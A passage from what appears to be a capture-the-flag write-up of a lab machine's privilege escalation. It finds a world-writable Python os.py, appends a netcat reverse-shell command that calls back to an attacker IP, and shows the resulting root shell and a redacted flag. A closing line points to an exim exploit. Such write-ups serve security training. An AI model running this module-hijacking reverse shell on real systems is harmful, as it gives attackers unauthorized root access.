...
[-] Files not owned by user but writable by group:
-rwxrw-rw- 1 nobody nogroup 46631 Oct 10 18:36 /etc/Development/LinEnum.sh
-rwxrw-rw- 1 nobody nogroup 5490 Oct 10 17:42 /etc/Development/shell.php
-rwxrwxrwx 1 root root 25910 Jan 15 2019 /usr/lib/python2.7/os.py
...
I can modify the os.py file and add a reverse shell at the end so when the module is imported by the script it’ll execute my reverse shell (we can hijack its execution – module hijacking)
friend@FriendZone:~$ echo "system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.12 9999 >/tmp/f')" >> /usr/lib/python2.7/os.py
$ nc -lvnp 9999
listening on [any] 9999 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.123] 60540
/bin/sh: 0: can't access tty; job control turned off
#
#whoami
root
#cd /root
#cat root.txt
b0e6XXXXXXXXXXXXXXXXXXXXXXXXXXXX
Also, exim is vulnerable for privesc
https://www.exploit-db.com/exploits/46996